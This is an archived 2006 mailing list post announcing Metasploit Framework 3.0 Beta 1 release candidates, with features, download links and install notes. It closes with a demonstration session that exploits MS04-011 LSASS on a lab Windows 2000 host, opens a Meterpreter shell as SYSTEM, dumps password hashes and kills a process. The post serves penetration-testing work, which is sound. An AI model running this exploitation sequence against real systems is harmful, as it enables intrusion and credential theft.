Metasploit mailing list archives
Metasploit Framework 3.0 Beta 1 (Almost!)
From: hdm at metasploit.com (H D Moore)
Date: Mon, 31 Jul 2006 03:20:31 -0500
Hi everyone, We could use some help testing out the next version of the Metasploit Framework. If you could take a few minutes to download the release candidates below and send us your feedback, we would appreciate it. If everything goes well, the actual Beta-1 release of 3.0 will happen on the morning of August 2nd (Wednesday) at the Black Hat conference in Las Vegas. If you would like to discuss the beta release with other users, please subscribe to the framework-beta mailing list by sending a blank email to framework-beta-subscribe[at]metasploit.com. Please keep all replies related to the beta release candidate off of the main framework mailing list in order to spare the bandwidth of those not interested. Some quick highlights compared to version 2.6: - Smaller exploit set, since not everything has been ported - All modules are organized in a tree, versus flat lists - The Meterpreter payload is much smoother all around - New type of "passive" exploits (browser, sniffer, ids attacks) - Denial of service modules (ms05-035 and unpatched RRAS) - Support for multiple shells per exploit with passive modules Unix users should use the following tarball: - http://metasploit.com/tools/framework-3.0-beta-1-rc1.tar.gz Windows users should use the following installer: - http://metasploit.com/tools/framework-3.0-beta-1-rc1.exe Unix users may need to install the openssl and zlib ruby modules for the Framework to load. If you are using Ubuntu, run the following commands: # apt-get install libzlib-ruby # apt-get install libopenssl-ruby User of other distributions or Unix flavors may want to grab the latest version of ruby from www.ruby-lang.org and build it from source. Windows users will need to exit out of any running Cygwin-based applications before running the installer or using the Framework. We really tried to work with the native ruby interpreter for Windows, but numerous io/readline/stdin issues came up and we will try again once the code base gets a little more stable. These RC1 installers will be removed as soon as the final version of Beta-1 becomes stable. Please read documentation/LICENSE for the new licensing terms of the Metasploit Framework (3.x only). Thanks! -HD A quick demonstration of using msfconsole with meterpreter: ____________ < metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ msf v3.0-beta-1 + -- --=[ 86 exploits - 90 payloads + -- --=[ 16 encoders - 4 nops =[ 4 aux msf > use exploit/windows/smb/ms04_011_lsass msf exploit(ms04_011_lsass) > set RHOST 192.168.0.106 RHOST => 192.168.0.106 msf exploit(ms04_011_lsass) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms04_011_lsass) > exploit [*] Started bind handler.. [*] Getting OS information... [*] Trying to exploit Windows 2000 LAN Manager [*] Transmitting intermediate stager for over-sized stage...(89 bytes) [*] Sending stage (2834 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (73739 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (192.168.0.145:41829 -> 192.168.0.106:4444) [*] The DCERPC service did not reply to our request Loading extension stdapi...success. meterpreter > getuid Server username: SYSTEM meterpreter > use priv Loading extension priv...success. meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: IUSR_WIN2000DC:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: IWAM_WIN2000DC:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: NetShowServices:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: TsInternetUser:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: meterpreter > cd c:\ meterpreter > ls Listing: c:\ ============ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 IO.SYS 100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 MSDOS.SYS 40777/rwxrwxrwx 0 dir Sat Oct 09 11:21:49 CDT 2004 RECYCLER 40777/rwxrwxrwx 0 dir Sat May 21 18:12:30 CDT 2005 WINNT 100666/rw-rw-rw- 195 fil Sat Oct 09 05:38:57 CDT 2004 boot.ini 100444/r--r--r-- 214416 fil Mon Dec 06 14:00:00 CST 1999 ntldr [ snip ] meterpreter > ps Process list ============ PID Name Path --- ---- ---- 176 smss.exe \SystemRoot\System32\smss.exe 200 csrss.exe \??\C:\WINNT\system32\csrss.exe 224 winlogon.exe \??\C:\WINNT\system32\winlogon.exe 252 services.exe C:\WINNT\system32\services.exe 264 lsass.exe C:\WINNT\system32\lsass.exe 440 svchost.exe C:\WINNT\system32\svchost.exe [ snip ] 1804 wins.exe C:\WINNT\System32\wins.exe 2676 logon.scr C:\WINNT\system32\logon.scr meterpreter > kill 2676 Killing: 2676
Current thread:
- Metasploit Framework 3.0 Beta 1 (Almost!) H D Moore (Jul 31)